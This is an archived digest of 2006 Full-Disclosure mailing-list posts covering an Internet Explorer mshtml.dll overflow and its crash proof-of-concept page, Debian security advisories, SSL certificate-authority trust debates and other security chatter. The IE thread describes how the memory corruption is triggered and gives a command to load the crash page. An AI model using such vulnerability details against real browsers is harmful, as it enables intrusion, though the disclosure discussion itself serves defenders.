what the SSL PKI provides, and we agree that what it does provide is
fragile.

cheers,
tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Hariharan]

This does not repro on IE7 though

-Hariharan

- Original Message - 
From: "Michal Zalewski" <[EMAIL PROTECTED]>

To: "Daniel Bonekeeper" <[EMAIL PROTECTED]>
Cc: ; <[EMAIL PROTECTED]>; 


Sent: Friday, March 17, 2006 2:43 AM
Subject: Re: Remote overflow in MSIE script action handlers (mshtml.dll)



On Thu, 16 Mar 2006, Daniel Bonekeeper wrote:


BTW, tested the POC on MSIE (File Version = 6.00.2900.2180
(xpsp_sp2_rtm.040803-2158)) with mshtml.dll (6.00.2900.2802
(xpsp_sp2_gdr.051123-1230)) and it didn't worked.


Daniel followed up with me in private and confirmed that the PoC *did*
work for him when he followed certain additional instructions: because the
attack depends on memory layout and usage, to get consistent results, be
sure to close *all* MSIE windows, then go to Start -> Run... and type:

 iexplore http://lcamtuf.coredump.cx/iedie.html

That should crash the browser immediately, because there are no other
buffers nearby to "absorb" the initial fencepost. Still, if no dice, try
hitting 'Reload' a couple of times.

/mz 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RE: Remote overflow in MSIE script action handlers (mshtml.dll)

[David Schenz]

Tested on Win2k3 Standard, fully patched... 

Mshtml.dll 6.0.3790.2577
Iexplore.exe 6.0.3790.1830

PoC does work.


David Schenz
[EMAIL PROTECTED]

-Original Message-
From: Michal Zalewski [mailto:[EMAIL PROTECTED] 
Sent: Thursday, March 16, 2006 4:14 PM
To: Daniel Bonekeeper
Cc: bugtraq@securityfocus.com; [EMAIL PROTECTED];
full-disclosure@lists.grok.org.uk
Subject: Re: Remote overflow in MSIE script action handlers (mshtml.dll)

On Thu, 16 Mar 2006, Daniel Bonekeeper wrote:

> BTW, tested the POC on MSIE (File Version = 6.00.2900.2180
> (xpsp_sp2_rtm.040803-2158)) with mshtml.dll (6.00.2900.2802
> (xpsp_sp2_gdr.051123-1230)) and it didn't worked.

Daniel followed up with me in private and confirmed that the PoC *did*
work for him when he followed certain additional instructions: because
the
attack depends on memory layout and usage, to get consistent results, be
sure to close *all* MSIE windows, then go to Start -> Run... and type:

  iexplore http://lcamtuf.coredump.cx/iedie.html

That should crash the browser immediately, because there are no other
buffers nearby to "absorb" the initial fencepost. Still, if no dice, try
hitting 'Reload' a couple of times.

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Tomasz Onyszko]

Michal Zalewski wrote:

  iexplore http://lcamtuf.coredump.cx/iedie.html


In this way it works on IE7 Beta as well

--
Tomasz Onyszko
http://www.w2k.pl/blog/ - (PL)
http://blogs.dirteam.com/blogs/tomek/ - (EN)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Daniel Bonekeeper]

BTW, tested the POC on MSIE (File Version = 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))
with mshtml.dll (6.00.2900.2802 (xpsp_sp2_gdr.051123-1230)) and it didn't worked.
 
On 3/16/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
Good morning,This might not come as a surprise, but there appears to be a *very*interesting and apparently very much exploitable overflow in Microsoft
Internet Explorer (mshtml.dll).This vulnerability can be triggered by specifying more than a couplethousand script action handlers (such as onLoad, onMouseMove, etc) for anysingle HTML tag. Due to a programming error, MSIE will then attempt to
write memory array out of bounds, at an offset corresponding to the ID ofthe script action handler multiplied by 4 (due to 32-bit address clipping,the result is a small positive integer).The list of IDs can be found on the Web, and is as follows (values in
parentheses = resulting offsets): (+0x45df4) (+0x45de0) (+0x45de4) (+0x45dd8) (+0x45dd4)
 (+0x45ddc) (+0x45dcc) (+0x45dc8) (+0x45dd0) (+0x45dc4) (+0x45dc0)
 (+0x45e24) (+0x45e18) (+0x45e08) (+0x45e0c) (+0x45e4c) (+0x45e54)
What happens next depends on the structure of the page in which themalicious tag is embedded, as well as previously visited page andpreviously initialized extensions (all these factors can be controlled by
the attacker).When the offending page contains no additional elements, and the user isnot redirected from elsewhere, the browser will typically crashimmediately, because there is no allocated memory at the resulting offset.
In all other cases, crashes will typically occur later, due to attempteduse of unrelated but corrupted in-memory buffers -for example, when theuser attempts to leave or reload the page. Another good example is coming
from a page that contains Macromedia Flash - this usually causes the Flashplugin itself to choke on corrupted memory on cleanup.For non-believers, there's a short but fiery demonstration page available
at http://lcamtuf.coredump.cx/iedie.html (yes, it will probably crash yourbrowser).Tested on MSIE 6.0.2900.2180.xpsp2.040806-1825 on Windows XP SP2. As far
as I can tell, other browser makes (Firefox, Opera) are not susceptible tothis attack.I eagerly await due reprimend from Microsoft for not disclosing thisvulnerability in a manner that benefits them most, not passing start, not
collecting $200 (from iDefense?).Regards,/mzhttp://lcamtuf.coredump.cx/silence/-- What this world needs is a good five-dollar plasma weapon. 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall

[Brian Eaton]

On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> On Wed, 15 Mar 2006 15:14:47 EST, Brian Eaton said:
> > tim-security at sentinelchicken.org wrote:
>
> > How trustworthy are the CA certificates included in the average browser?
> >
> > There are a couple of dozen CA certificates shipped with my browser.
> > Some of the vendors associated with these CA certificates offer to
> > give me a certificate for my web site in 10 minutes or less for a
> > couple of hundred dollars.
> >
> > This sounds like a really ripe opportunity for social engineering to me.
>
> Been there, done that already.  There was a phishing run a while ago,
> the guys even had a functional SSL cert for www.mountain-america.net (the
> actual bank was mntamerica.net or something like that..)
>
> Only real solution there is to get a good grip on what a CA is actually
> certifying, which is a certain (usually very minimal) level of
> *authentication*. They're certifying that somebody convinced them that the 
> cert
> was for who they claimed it was for.  That's it.  Anybody who attaches any
> *other* meaning to it is making a big mistake.  In particular, "authorization"
> is totally out-of-scope here
>
> "You are now talking to the site that one of the CAs you trust thinks belongs
> to Frobozz, Inc.".
>
> If you don't trust that CA's judgment, you better heave their root cert 
> overboard...
>

Brian Krebs from the Washington Post wrote a column about the Mountain
America scam, and he even got somebody from Geotrust to comment on
what went wrong.

The column is here:
http://blog.washingtonpost.com/securityfix/2006/02/the_new_face_of_phishing_1.html

Here's the section of the article that has Geotrust's response:

Joan Lockhart, the company's vice president of marketing, said the
site was registered on Sunday and the cert was issued early this
morning. Lockhart said Geotrust has a rigorous process in place to
check for phishy certificate requests that relies on algorithms which
check cert requests for certain words, misspellings or phrases that
may indicate a phisher is involved. In this case, she said, the
technology did not flag the request because there was nothing in the
Internet address to indicate the site was at all related to a
financial institution.

Geotrust's cert verification process is largely automated: when
someone requests a cert for a particular site, the company sends an
e-mail to the address included in the Web site's registrar records,
along with a special code that the recipient needs to phone in to
complete the process.

Lockhart said she doubted that inserting a human into that process
would have flagged the account as suspicious.

"I would argue that probably anyone who is processing
mountain-america.net would not have raised flags," she said.


My read of that statement is that Geotrust sees nothing wrong with
their verification process and is not going to take any action to
prevent this from happening again.

The incentives for the CAs are in all the wrong places.  They suffer
no financial harm when they certify a false identity.  Instead, they
make a quick buck.

- Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] HTTP AUTH BASIC monowall.

[Brian Eaton]

Simon Smith simon at snosoft.com wrote
> My first thought was on how to harden the
> authentication because the basic auth didn't cut it for me. Thats what I
> am looking for ideas for.

Here are some things to start with:

Client certificates.
Kerberos.
Two-factor authentication.

Unfortunately with web applications you not only need to worry about
the initial authentication, but how the session is maintained.  If the
session is maintained using cookies, all the strong authentication in
the world won't save you from having that session hijacked.

- Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Felix Lindner]

Hi,

On Thu, 16 Mar 2006 09:48:07 -0500
Simon Smith <[EMAIL PROTECTED]> wrote:
> My first thought was on how to harden the
> authentication because the basic auth didn't cut it for me. Thats what I
> am looking for ideas for.

you may be looking for Digest Authentication:
http://www.ietf.org/rfc/rfc2617.txt:

   "Like Basic, Digest access authentication verifies that both parties
   to a communication know a shared secret (a password); unlike Basic,
   this verification can be done without sending the password in the
   clear, which is Basic's biggest weakness. As with most other
   authentication protocols, the greatest sources of risks are usually
   found not in the core protocol itself but in policies and procedures
   surrounding its use."

cheers
FX

-- 
SABRE Labs | Felix 'FX' Lindner <[EMAIL PROTECTED]> 
http://www.sabre-labs.com  | +49 171 7402062
   | A740 DE51 9891 19DF 0D05  
   | 13B3 1759 C388 C92D 6BBB

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1006-1] New wzdftpd packages fix arbitrary shell command execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1006-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 16th, 2005http://www.debian.org/security/faq
- --

Package: wzdftpd
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2005-3081

"kcope" discovered that the wzdftpd FTP server lacks input sanitising
for the SITE command, which may lead to the execution of arbitrary
shell commands.

The old stable distribution (woody) does not contain wzdftpd packages.

For the stable distribution (sarge) this problem has been fixed in
version 0.5.2-1.1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.5.5-1.

We recommend that you upgrade your wzdftpd package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1.dsc
  Size/MD5 checksum:  770 9b5198715396dc3241b38522866236eb

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1.diff.gz
  Size/MD5 checksum:18064 56f5a27176316cbe9f6e33f271fa2137

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2.orig.tar.gz
  Size/MD5 checksum:   818860 62a4af39801fe581f85cd063c5fc4717

  Alpha architecture:


http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1_alpha.deb
  Size/MD5 checksum:   309938 42447c188199c9cea54a0658801ce243

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge1_alpha.deb
  Size/MD5 checksum:30594 02069d4746a86be34df3fa9347f2392d

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge1_alpha.deb
  Size/MD5 checksum:   293354 dbacd04240390145f75b69fdf27b7bc5

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge1_alpha.deb
  Size/MD5 checksum:48864 e01b156146c1a68bd3ae51f689dc8d46

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge1_alpha.deb
  Size/MD5 checksum:31408 431162de3997ddebd36b3982c85bd449

  AMD64 architecture:


http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1_amd64.deb
  Size/MD5 checksum:   286298 589a84919dd29f5858d9be5db77a9f7f

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge1_amd64.deb
  Size/MD5 checksum:29872 df640d1cc2191eb6f1bfbdca5bf31b20

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge1_amd64.deb
  Size/MD5 checksum:   217728 0feb9461d80aae2138823e63e0faef32

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge1_amd64.deb
  Size/MD5 checksum:47044 eccd196638b0cd8c953dc8944e4062af

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge1_amd64.deb
  Size/MD5 checksum:30774 361bcb02132181eefb2eb06402d134f9

  ARM architecture:


http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1_arm.deb
  Size/MD5 checksum:   268212 f89c5793822e3852a1e8c1badbca0d5e

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge1_arm.deb
  Size/MD5 checksum:29184 afa126d2b1671d44c241dc3ddea35e86

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge1_arm.deb
  Size/MD5 checksum:   214212 f1c06effaa2cfb5d4ae141aaec1e1587

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge1_arm.deb
  Size/MD5 checksum:45668 925aeb76dd948aec878fe160d5021130

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge1_arm.deb
  Size/MD5 checksum:29498 4512a8bf5fc97a1ff2abb9c5124060c0

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge1_i386.deb
  Size/MD5 checksum:   276502 97f51d6d1e654df0bb6f081e25a9b650

http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge1_i386.deb
  Size/MD5 checksum:29168 1dbfb15d29d721099e5a2888b6de0c9b

http://security.debi

[Full-disclosure] [SECURITY] [DSA 1005-1] New xine-lib packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1005-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 16th, 2006http://www.debian.org/security/faq
- --

Package: xine-lib
Vulnerability  : buffer overflow
Problem-Type   : local (remote)
Debian-specific: no
CVE ID : CVE-2005-4048
Debian Bug : 342208

Simon Kilvington discovered that specially crafted PNG images can trigger
a heap overflow in libavcodec, the multimedia library of ffmpeg, which may
lead to the execution of arbitrary code.
xine-lib includes a local copy of libavcodec.

The old stable distribution (woody) isn't affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.1-1sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 1.0.1-1.5.

We recommend that you upgrade your xine-lib package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge2.dsc
  Size/MD5 checksum: 1061 158c6502017809a4541cd265db09621c

http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1-1sarge2.diff.gz
  Size/MD5 checksum: 2986 5fd44fe96e5108cf679ef44f192613c4

http://security.debian.org/pool/updates/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
  Size/MD5 checksum:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  Alpha architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_alpha.deb
  Size/MD5 checksum:   107588 7f06d1cb985a61ca44fa3461a3eaf3cc

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_alpha.deb
  Size/MD5 checksum:  4829082 228ff31121d6f76cd2b0fc7daa158f74

  AMD64 architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_amd64.deb
  Size/MD5 checksum:   107590 92ee9f9935602150c66322e69216775b

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_amd64.deb
  Size/MD5 checksum:  3933250 73db71eeca2783969628c539a2b1727c

  ARM architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_arm.deb
  Size/MD5 checksum:   107654 1d56163fe790f670a1ecd4332ed83502

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_arm.deb
  Size/MD5 checksum:  3878282 9bbe8e8aa694871113c3cb7de0a7def7

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_i386.deb
  Size/MD5 checksum:   107596 27a603fb3792421dcd31638a00fd25fd

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_i386.deb
  Size/MD5 checksum:  4149238 c8d553662c11bd6706cd24db83ff3e13

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_ia64.deb
  Size/MD5 checksum:   107594 9938d8ee69efa27b7a25301a496bc430

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_ia64.deb
  Size/MD5 checksum:  5620582 1e3db94b9aa316e83f51a85bdd5a0a8a

  HP Precision architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_hppa.deb
  Size/MD5 checksum:   107608 6f845dc1fff976cbdcdd4776682a9670

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_hppa.deb
  Size/MD5 checksum:  3598606 06e65cb9affa54daf57237a3104e

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_m68k.deb
  Size/MD5 checksum:   107664 131691f86da71a21b9d76da8336aa73d

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_m68k.deb
  Size/MD5 checksum:  3175090 cd32d601e7995a4d9afe5e5ef3aa9265

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/x/xine-lib/libxine-dev_1.0.1-1sarge2_mips.deb
  Size/MD5 checksum:   107608 e016c8dfa33cfa0aeffe77561fc47816

http://security.debian.org/pool/updates/main/x/xine-lib/libxine1_1.0.1-1sarge2_mips.deb
  Size/MD5 checksum:  4066510 94b3b4b636445b2f2868257da0e4ed8a

  Little endian MIPS architecture:

[Full-disclosure] [SECURITY] [DSA 1004-1] New vlc packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1004-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
March 16th, 2006http://www.debian.org/security/faq
- --

Package: vlc
Vulnerability  : buffer overflow
Problem-Type   : local (remote)
Debian-specific: no
CVE ID : CVE-2005-4048
Debian Bug : 342208

Simon Kilvington discovered that specially crafted PNG images can trigger
a heap overflow in libavcodec, the multimedia library of ffmpeg, which may
lead to the execution of arbitrary code.
The vlc media player links statically against libavcodec.

The old stable distribution (woody) isn't affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 0.8.1.svn20050314-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.8.4.debian-2.

We recommend that you upgrade your vlc package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.1.svn20050314-1sarge1.dsc
  Size/MD5 checksum: 1883 b01ca47f88d5b1b3aa67aa9cf8558f79

http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.1.svn20050314-1sarge1.diff.gz
  Size/MD5 checksum:  873 f50e58c336006d091a54374866edc02d

http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.1.svn20050314.orig.tar.gz
  Size/MD5 checksum:  9746520 51ecfbb072315eacf7fcaf250c26f5cb

  Alpha architecture:


http://security.debian.org/pool/updates/main/v/vlc/gnome-vlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum: 1270 d38080ad62c08a7cd260bca1309826f5

http://security.debian.org/pool/updates/main/v/vlc/gvlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum: 1278 8e832e0aa51c192025331640e5039602

http://security.debian.org/pool/updates/main/v/vlc/kvlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  980 26f78ab914f614b94cf20ac5e3403ae4

http://security.debian.org/pool/updates/main/v/vlc/libvlc0-dev_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  1092778 36678b430b42c0404b38d78fab6fe0fa

http://security.debian.org/pool/updates/main/v/vlc/mozilla-plugin-vlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:   730978 ab97ad39cc17192a24355ae337996db7

http://security.debian.org/pool/updates/main/v/vlc/qvlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  966 440c2a0b1f27b61cd0854d140627d0d3

http://security.debian.org/pool/updates/main/v/vlc/vlc_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  6365392 aeb7805b91ba501d491b29aeb7a21af3

http://security.debian.org/pool/updates/main/v/vlc/vlc-alsa_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  876 249ee46d747ddd2ce87d4c08ee6f4705

http://security.debian.org/pool/updates/main/v/vlc/vlc-esd_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  874 f919dccff01446bc5950f6868d47e9e4

http://security.debian.org/pool/updates/main/v/vlc/vlc-ggi_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  876 8049e253efd274026cac0f31e2f1ef4f

http://security.debian.org/pool/updates/main/v/vlc/vlc-gnome_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  870 0e677f46d898c3798bd393af55791952

http://security.debian.org/pool/updates/main/v/vlc/vlc-gtk_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:  866 189cbaf6b6c5e56678e6af172a4f153f

http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-alsa_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum:11120 accad8c91e2ad6e841f0237efed25d45

http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-arts_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum: 4414 7fbdc10f3320fb31c4a6919fc4a2b84b

http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-esd_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum: 4540 bd7ed6fe7992a74f03efe2fc385e485d

http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-ggi_0.8.1.svn20050314-1sarge1_alpha.deb
  Size/MD5 checksum: 7282 598c83b24ba1d91902ec8e84d70aed1b

http://security.debian.org/pool/updates/main/v/vlc/vlc-plugin-sdl_0.8.1.svn20050314-1sa

Re: [Full-disclosure] HTTP AUTH BASIC monowall

[bkfsec]

Tim wrote:




I think you are lumping several types of trust into one.  (Though please
correct me if I'm wrong.)
 

My discussion was meant solely to discuss the "web of trust" as it 
relates to SSL Cert Authorities, which was the scope of my message.  I 
wouldn't refer to the PGP "web of trust" as having the same issues 
because, as you accurately point out, the two methods of trust are 
different.


And, again, as you accurately point out, the reason why SSL cert trust 
is flawed is the distinction of "forced trust"... meaning that in the 
SSL cert game, you have to trust the CAs whereas in PGP trust you're 
actually trusting someone you know and deciding on trust in a more 
granular fashion.





So, I argue the two-parameter, trust-degrading system OpenPGP uses fails
much more gracefully than SSL's PKI.  I can ultimately trust that your
key is really yours, but I don't have to trust that you'll properly
verify others' keys.  As we follow the transitive chain of trust, the
trust decreases.
 


And I would agree with you completely.


People really do operate in webs like this.  Obviously verifying
identities yourself is safer, but if your buddy tells you someone is
legit, you will likely trust that at least a little (and with PGP, you
can trust that referral as much or little as you like, without telling
your buddy how much you trust him).
 

Yes, they do... it's where the whole thing becomes automated and 
"submerged" (as it is with SSL) that things become flawed.  Some people 
tend to ratchet the web of trust onto SSL in an attempt to show that it 
is verifiable ("the CAs would NEVER falsely identify an organization 
because then you'd NEVER trust them", etc...) and that's where the 
mistake is made.


There's some truth to the statement that CAs want to avoid falsely 
certifying organizations... but the problem is that people assume that 
they're detectives at verifying business practice and that is not the 
case.  It's just not in the scope of what they do.  They're in the 
business of verifying identity and providing certificates for 
cryptographic usage... no more, no less. :)



Please tell me how this is worse than all-or-nothing CA trust in SSL.
(Besides issues with usability.)

 

It's not at all worse... it's just that people apply the wrong level of 
consideration to certificates sometimes and this ends with the result of 
giving people a false sense of security when they see that little 
padlock at the bottom of their screen.


Don't get me wrong, there's obvious value in the certificate system.  
Because I waxed philosophical about webs of trust doesn't mean I want to 
throw the baby out with the bathwater.  :)


-bkfsec


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Filtering Latest Spam Run (radio.toad.com)

[Damian Gerow]

Thus spake Jason Coombs ([EMAIL PROTECTED]) [16/03/06 04:33]:
: uh huh, and now we know the spam kiddie responsible. I pay by the KB to 
: receive all your junk, so you can expect a lawsuit in the near future.

You pay by the KB and subscribe to FD?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Generically Determining the Prescence of Virtual Machines

[valsmith]

At OffensiveComputing we were looking at ways to detect virtual machines and had found and discarded many unsophisticated methods such as looking for VMWare Tools running as a service or VMWare related registy keys, etc. Then we discovered Joanna Rutkowska's very interesting "Redpill" method. This was an eye opening work for us. After spending a little time playing with it we realized it wasn't fool proof on multiprocessor systems and so we decided to research the problems and possible ways to improve on the method. We discovered and implemented an improved method which is presented in the this paper.
http://www.offensivecomputing.netV.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Andrew Simmons]

Simon Smith wrote:


Ok, so what's your alternative?


[...]


Some form of challenge response?  If you can already perform a man in
the middle attack, than challenge response is just as vulnerable. 
Just connect to the server when the client hits you, and pass them the

challenge you recieved.  Use the credential yourself, and pass them a
failure.  When they try again, connect them to the server.



You're right again.  Does everyone here think that the majority of
companies hire security aware people?



We're not talking about general staff, we're talking about your firewall 
admin. If your firewall admin doesn't care about security you've got 
much bigger problems. Which appears to be the case...



\a

--
Andrew Simmons // MessageLabs Security Team
Technical Security Consultant
MessageLabs: Be certain

__
This email has been scanned by the MessageLabs Email Security System.
For more information please visit http://www.messagelabs.com/email 
__


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=% Buffer Overflow in Microsoft Access

[leToff]

Dave Korn wrote :

>  I don't see how you could tell from that received header whether the 
>machine is a proxy, or whether it originated the traffic itself.
>
>
Simply because I sent that message myself using telnet connected to the
1st MX of toad.com (not tested the 2nd). It's so easy to verify by
yourself that I don't understand why you don't trust me.

BTW, Open Relay is propably more appropriate to define this machine.

-- 
leToff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006= % Buffer Overflow in Microsoft Access

[Michael Holstein]

 > Well, by default, Tor doesn't allow port 25 out of exit nodes. In

this case however, not only has the operator opened up port 25 out,
effectively making it an open relay, but he's actively sniffing and
publishing exit node traffic - apparently under the misguided belief
that it makes him appear terribly clever.


Uh huh .. which is why those of us that use TOR do this in our 
/etc/tor/torrc :


excludenodes jackass1,jackass2, etc

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: SSH Scans - Homebrew dictionary

[Dave Korn]

"PERFECT.MATERIAL" <[EMAIL PROTECTED]> wrote in message
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such
> malicious behavior. Please rescind your inflammatory and racist
> statement or risk gaining a reputation as a person who dislikes his
> fellow brown person. It's because of people like you that Eazy-E died
> of AIDS.
>
> PERFECT.MATERIAL


  Say, don't I remember you from teh flonk a few years back?

cheers,
  DaveK
-- 
Can't think of a witty .sigline today



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] What about subscriber only?

[Line Noise]
